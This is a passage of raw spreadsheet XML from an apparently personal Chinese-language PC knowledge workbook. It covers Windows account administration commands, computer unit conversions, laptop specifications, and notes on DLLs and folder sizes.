    <sheet name="HP Pavilion dv2623" sheetId="13" r:id="rId91"/>
    <sheet name="程序和DLL文件" sheetId="14" r:id="rId92"/>
    <sheet name="文件夹大小的显示" sheetId="4" r:id="rId93"/>
    <sheet name="WD table cell" sheetId="19" r:id="rId94"/>
    <sheet name="Microsoft office" sheetId="17" r:id="rId95"/>
    <sheet name="Windows Live 软件包" sheetId="18" r:id="rId96"/>
    <sheet name="microsoft visual studio" sheetId="21" r:id="rId97"/>
    <sheet name="计算机英语缩略语" sheetId="20" r:id="rId98"/>
    <sheet name="Nero Burning ROM多区段DVD刻录" sheetId="22" r:id="rId99"/>
    <sheet name="光盘格式" sheetId="23" r:id="rId100"/>
    <sheet name="ISO映像文件操作" sheetId="25" r:id="rId101"/>
    <sheet name="系统安装明细" sheetId="26" r:id="rId102"/>
    <sheet name="Windows轻松传送" sheetId="12" r:id="rId103"/>
    <sheet name="windows7 宽带自动连接" sheetId="73" r:id="rId104"/>
    <sheet name="自动登录帐户" sheetId="7" r:id="rId105"/>
    <sheet name="blank (2)" sheetId="47" r:id="rId106"/>
    <sheet name="显卡" sheetId="108" r:id="rId107"/>
    <sheet name="显示器" sheetId="109" r:id="rId108"/>
    <sheet name="光驱" sheetId="106" r:id="rId109"/>
    <sheet name="硬盘" sheetId="80" r:id="rId110"/>
    <sheet name="内存" sheetId="79" r:id="rId111"/>
    <sheet name="主板" sheetId="54" r:id="rId112"/>
    <sheet name="CPU" sheetId="75" r:id="rId113"/>
    <sheet name="打印机" sheetId="113" r:id="rId114"/>
    <sheet name="扫描仪和UPS" sheetId="112" r:id="rId115"/>
    <sheet name="传真机" sheetId="111" r:id="rId116"/>
    <sheet name="复印机" sheetId="110" r:id="rId117"/>
    <sheet name="PC基础知识点index" sheetId="55" r:id="rId118"/>
    <sheet name="PC基础知识点" sheetId="24" r:id="rId119"/>
    <sheet name="电脑硬件组装" sheetId="65" r:id="rId120"/>
    <sheet name="电脑硬件组装图" sheetId="105" r:id="rId121"/>
    <sheet name="windows系统内容路径" sheetId="35" r:id="rId122"/>
    <sheet name="windows系统内容" sheetId="45" r:id="rId123"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">contents!$A$1:$E$116</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="122" hidden="1">windows系统内容!$A$1:$C$866</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="54" hidden="1">电脑不启动故障诊治全攻略!$A$20:$B$97</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="84">'Internet connection diagram'!$A$1:$C$73</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="122">windows系统内容!$A$1:$C$858</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="64">'驱动(driver)'!$A$1:$D$22</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="101">系统安装明细!$A$1:$D$84</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="15">'～$文档'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="2">blank!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="6">'CAD tips'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="29">Command!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="12">CSS样式!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="11">'Delphi '!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="23">'DOS、系统提示符、windows PE'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">dreamweaver基础!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="4">'flash 时间轴'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="13">HTML文档!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="19">Modem网络连接!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="30">'shortcut key'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="10">VF!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="14">word中英文混排的技巧!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="35">病毒修复、删除、隔离!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="46">操作系统原理!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="20">常见故障解决记录与技巧!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="28">常用cmd网络命令的用法!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="34">程序设计基础!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="115">传真机!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="113">打印机!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="31">打造三合一安装光盘!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="54">电脑不启动故障诊治全攻略!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="40">电脑死机原因种种!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="119">电脑硬件组装!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="37">防火墙!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="116">复印机!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="43">高级启动!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="49">黑客必学的六条系统命令!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="5">绘制等轴侧图形!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="16">将Word变为无所不能的播放器!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="47">'可启动光盘 硬盘 恢复盘 启动盘'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="18">宽带路由器设置!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="41">蓝屏并自动分析可能故障原因!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="24">软件是如何被破解的!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="114">扫描仪和UPS!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="32">杀毒软件如何辨忠奸!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="39">什么情况下适合修复系统而不是重装!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="38">是否有毒最关注的三大件!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="52">手机里暗藏的十大秘密!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="7">数据透视表!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="9">数组公式!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="36">网络的安全性!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="17">网络硬件!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="25">虚拟virtual!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="33">硬盘分区、数据丢失、恢复的经历!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="26">'远程控制 远程桌面和远程协助'!$1:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="42">在纯DOS模式下杀毒!$1:$2</definedName>
    <definedName name="XFD1052088">Excel基础!$XFD$1032109</definedName>
    <definedName name="XFD1062088">Excel基础!$XFD$1032109</definedName>
    <definedName name="XFD1092088">Excel基础!$XFD$1032109</definedName>
    <definedName name="XFD1111111">Excel基础!$XFD$1000020</definedName>
    <definedName name="XFD4448384">Excel基础!$XFD$448405</definedName>
  </definedNames>
  <calcPr calcId="125725" calcMode="manual"/>
  <pivotCaches>
    <pivotCache cacheId="0" r:id="rId124"/>
  </pivotCaches>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="E4" i="132" a="1"/>
  <c r="E4" s="1"/>
  <c r="B40" i="80"/>
  <c r="A62"/>
  <c r="C28" i="33"/>
  <c r="E9" i="19"/>
  <c r="E10"/>
  <c r="E11"/>
  <c r="E12"/>
  <c r="C29" i="6"/>
  <c r="C30"/>
  <c r="C31"/>
  <c r="E15" i="132" l="1"/>
  <c r="E13"/>
  <c r="E11"/>
  <c r="E9"/>
  <c r="E7"/>
  <c r="E5"/>
  <c r="E16"/>
  <c r="E14"/>
  <c r="E12"/>
  <c r="E10"/>
  <c r="E8"/>
  <c r="E6"/>
  <c r="E13" i="19"/>
  <c r="E14" s="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6801" uniqueCount="6243">
  <si>
    <t>修改注册表激活Administrator帐户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD---以管理身份运行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>local machine---software---microsoft---windows NT---current version---winlogon,新建子项：specialAccounts</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>新建子项：userlist</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>新建Dword32键值，键名：Administrator,值为1；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD:net user administrator /active:yes,然后回车；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>控制面板---设置面板；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>帐户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修改注册表激活Administrator帐户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Return to contents</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet connection diagram</t>
  </si>
  <si>
    <t>Internet connection diagram</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gold price for February delivery rose 14.30 U.S. dollars, or 1.6 percent, to 884.30 dollars an ounce. March silver gained 31.5 cents to 11.295 dollars per ounce. April platinum ended at 941.5 dollars per ounce, up 24.1 dollars.</t>
  </si>
  <si>
    <t>Excel表中的行高4.374单位</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1cm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel表中的28.5磅</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>赫兹,周</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>秒</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hz</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(1024</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)千兆或吉字节,Giga(十亿),T(Tril,万亿)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1GB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(1024</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>B),兆字节,M(Mega,百万,兆)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1MB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(1024</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>B),千字节,K(Kilo,千)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1KB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>8b,Byte(字节)(比特),保存1个英文或1个数字需要1B,1个汉字2B；常用KBps表示下载速度；网速100KB左右时即可正常看网络直播，网速在工厂快时可达700多KBps,下载一部电脑不需多久；</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>1B</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1bit,1个二进制数（0，1）；4M宽带是指4Mbps,约500KBps；网速测试软件亦是用Kbps;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1b</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCP/IP协议数据传输的基本单位（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>64-1518B</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>；）</t>
    </r>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>数据包</t>
  </si>
  <si>
    <t>1X=1350B/S;倍速是指光碟的数据传输率；</t>
  </si>
  <si>
    <t>DVD的倍速</t>
  </si>
  <si>
    <t>1X=150KB/S;倍速是指光碟的数据传输率；</t>
  </si>
  <si>
    <t>CD的倍速</t>
  </si>
  <si>
    <t>1.44M</t>
  </si>
  <si>
    <t>一软盘</t>
  </si>
  <si>
    <t>20-50K</t>
  </si>
  <si>
    <t>一网页</t>
  </si>
  <si>
    <t>3-7M左右</t>
  </si>
  <si>
    <t>一首MP3</t>
  </si>
  <si>
    <t>300-700M左右</t>
  </si>
  <si>
    <t>一部电影</t>
  </si>
  <si>
    <t>4.7G，MPEG-2的数据压缩标准；</t>
  </si>
  <si>
    <t>1单面DVD</t>
  </si>
  <si>
    <t>700M，正版CD保存寿命一般在10年左右</t>
  </si>
  <si>
    <t>1单面CD</t>
  </si>
  <si>
    <t>指的是内存的总线频率是400MHz；</t>
  </si>
  <si>
    <t>内存DDR400</t>
  </si>
  <si>
    <t>等于外频*2</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>AMD CPU FSB频率</t>
  </si>
  <si>
    <t>等于外频*4</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>Intel CPU FSB频率</t>
  </si>
  <si>
    <t>CPU与内存之间同步运行的速度；（内存与CPU之间不存在传动部件），CPU100Mhz指的是每秒CPU可以接收的数据传输量；</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>FSB频率</t>
  </si>
  <si>
    <t>CPU与主板之间同步运行的速度；</t>
  </si>
  <si>
    <t>外频</t>
  </si>
  <si>
    <t>CPU可使用多大容量的内存,如32位,则2的32次幂等于4G，CPU最多可直接访问4G的内存；1G等于2的30次幂；</t>
  </si>
  <si>
    <t>地址总线宽度</t>
  </si>
  <si>
    <t>一次运行的数据位数,如32位技术</t>
  </si>
  <si>
    <t>数据总线宽度</t>
  </si>
  <si>
    <t>计算机相关单位</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>计算机相关单位</t>
  </si>
  <si>
    <t>PC基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>blank</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自动登录帐户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>忘记自动登录密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD---net user wwu 1234</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自动登录帐户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>忘记自动登录密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ABC帐户只能在规定时间内登录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R---CMD---net user abc 123 /add /times:Monday-Friday,19:00-21:00;sa-su,18:00-22:00</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>禁止特定软件在另外一个帐户中运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R---secpol.msc：打开“本地安全策略控制台”---软件限制策略单击---右边窗口：其他规则右击，新建路径规则---路径：指定特定软件安装路径的exe文件，安全级别：不允许；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ABC帐户只能在规定时间内登录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>禁止特定软件在另外一个帐户中运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>帐户基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>帐户基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用一个帐户就像作用一台独享的计算机，每位用户都有属于自己的该当，图片，音乐和视频文件夹，用于存储相关文件，每个用户帐户可以拥有自己的电子邮件帐户和Internet收藏夹，每位用户都可以按自己的喜好自定义桌面，开始菜单和其它设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>删除一个有人使用过的帐户时一定要小心，因为同时会删除它所有的电子邮件，电帐贴和internet收藏夹，如果不小心，还有可能删除该用户文档所有文件，包括我的文档和在桌面保存的文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>桌面desktop:对应放在桌面的文件夹和文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>收藏夹favorite:对应IE收藏的网址；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>链接Link：对应资源管理器收藏的文件或文件夹快捷方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>我的文档、下载、链接；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>删除一个帐户：会询问，是删除文件还是保留文件，但无法保存帐户的电子邮件和其它设置；（如需保存，可以使用windows轻松传送）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WWU使用一段时间后，AppData的数据量会骤增；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当删除一个帐户、新建一个帐户，需要做以下工作：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输入法需添加；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络宽带连接需要重新建立；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE需要重新设置，当然，收藏夹会没了，如果有备份，可复制到新帐户的上述路径；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>桌面、任务栏需重新设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>将帐户的全部设置轻松保存到一个系统文档利用轻松传送功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows轻松传送</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows轻松传送</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>参考Windows轻松传送</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>允许您将设置和文件配置到另一台电脑或另一个帐户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可以传输的内容：用户帐户、IE收藏夹、电子邮件及其他文件等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传输完成后，您将看到已传输内容的列表，要在新PC上安装的程序以及可能需要下载的程序的链接；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传输方式：电缆、网络、外部介质；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>……正在检查传输的内容：自定义选择各帐户的内容；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>……保存（可达到几百M）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>……在目标PC上打开轻松传送---浏览到保存的轻松传送文件---选择内容---高级：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>家长控制功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>管理员帐户设置密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>新建标准帐户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在标准帐户控制面板中设置家长控制功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设置可使用的时间、可使用的程序、游戏等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>品牌</t>
  </si>
  <si>
    <t>HP</t>
  </si>
  <si>
    <t>CPU类型</t>
  </si>
  <si>
    <t>Intel Core2 Duo T7250 FSB 800MHz</t>
  </si>
  <si>
    <t>内存类型</t>
  </si>
  <si>
    <t>DDR2</t>
  </si>
  <si>
    <t>内存大小</t>
  </si>
  <si>
    <t>1024MB</t>
  </si>
  <si>
    <t>笔记本主频</t>
  </si>
  <si>
    <t>2000 MHz</t>
  </si>
  <si>
    <t>迅驰技术</t>
  </si>
  <si>
    <t>迅驰4</t>
  </si>
  <si>
    <t>系统总线频率</t>
  </si>
  <si>
    <t>667MHz</t>
  </si>
  <si>
    <t>硬盘描述</t>
  </si>
  <si>
    <t>SATA 5400RPM</t>
  </si>
  <si>
    <t>光驱描述</t>
  </si>
  <si>
    <t>内置支持光雕(LightScribe)和双层刻录技术的 Super Multi DVD+/-RW</t>
  </si>
  <si>
    <t>标准分辨率</t>
  </si>
  <si>
    <t>1280×800</t>
  </si>
  <si>
    <t>独立显卡</t>
  </si>
  <si>
    <t>支持</t>
  </si>
  <si>
    <t>无线网卡</t>
  </si>
  <si>
    <t>802.11 a/b/g</t>
  </si>
  <si>
    <t>读卡器</t>
  </si>
  <si>
    <t>5合1读卡器</t>
  </si>
  <si>
    <t>集成摄像头</t>
  </si>
  <si>
    <t>内置感光摄像头</t>
  </si>
  <si>
    <t>笔记本芯片组</t>
  </si>
  <si>
    <t>Intel 965PM</t>
  </si>
  <si>
    <t>光驱类型</t>
  </si>
  <si>
    <t>DVD刻录机</t>
  </si>
  <si>
    <t>宽屏</t>
  </si>
  <si>
    <t>显卡芯片</t>
  </si>
  <si>
    <t>nVidia Geforce 8400M GS</t>
  </si>
  <si>
    <t>内置音箱</t>
  </si>
  <si>
    <t>有</t>
  </si>
  <si>
    <t>I/O接口</t>
  </si>
  <si>
    <t>1个IEEE 1394端口，2个USB2.0端口，1个HDMI接口，1个5合1读卡器，1个VGA接口，1个S-Video接口，1个RJ-45接口，1个RJ-11，1个ExpressCard 54mm插槽，红外线端口，耳机、麦克风插孔和外接电源插孔</t>
  </si>
  <si>
    <t>笔记本重量</t>
  </si>
  <si>
    <t>2.4 Kg</t>
  </si>
  <si>
    <t>预装操作系统</t>
  </si>
  <si>
    <t>Windows Vista home premium</t>
  </si>
  <si>
    <t>音频系统</t>
  </si>
  <si>
    <t>内置音效芯片</t>
  </si>
  <si>
    <t>显示屏尺寸</t>
  </si>
  <si>
    <t>14.1英寸</t>
  </si>
  <si>
    <t>显示屏描述</t>
  </si>
  <si>
    <t>1280*800</t>
  </si>
  <si>
    <t>HP Pavilion dv2623</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Return to contents</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HP Pavilion dv2623</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电池仓内的两个螺丝可拆开键盘；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘仓内的两个螺丝可拆卸光驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序和DLL文件</t>
  </si>
  <si>
    <t>程序和DLL文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>微软解决这一问题的办法就是将大软件分成许多小的DLL文件模块，每个DLL各司其职，比如a.dll只负责显示窗口界面，b.dll文件只负责后台数据处理，最后由一个很小的exe可执行程序统一调用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DLL文件存在windows系统和应用程序文件中；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个软件的所有功能，可以只在一个单独的exe程序文件中实现，但这样的文件会很大，调用时不管它用得着用不着的功能全部加载到内存中，太浪费系统资源。而且只有一个程序文件，升级或改错都很麻烦；某个功能的修改，可能导致整个软件要重创一次。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件夹大小的显示</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件夹大小的显示</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows资源管理器的一个缺陷只是没有直接显示文件夹的大小；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当鼠标指向某一文件夹时，会自动提示该文件夹的大小，但其中隐藏的文件或文件的大小示包括在内，只有当实际查看该文件夹的属性时，才会真正看到其文件夹的实际大小；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Word</t>
  </si>
  <si>
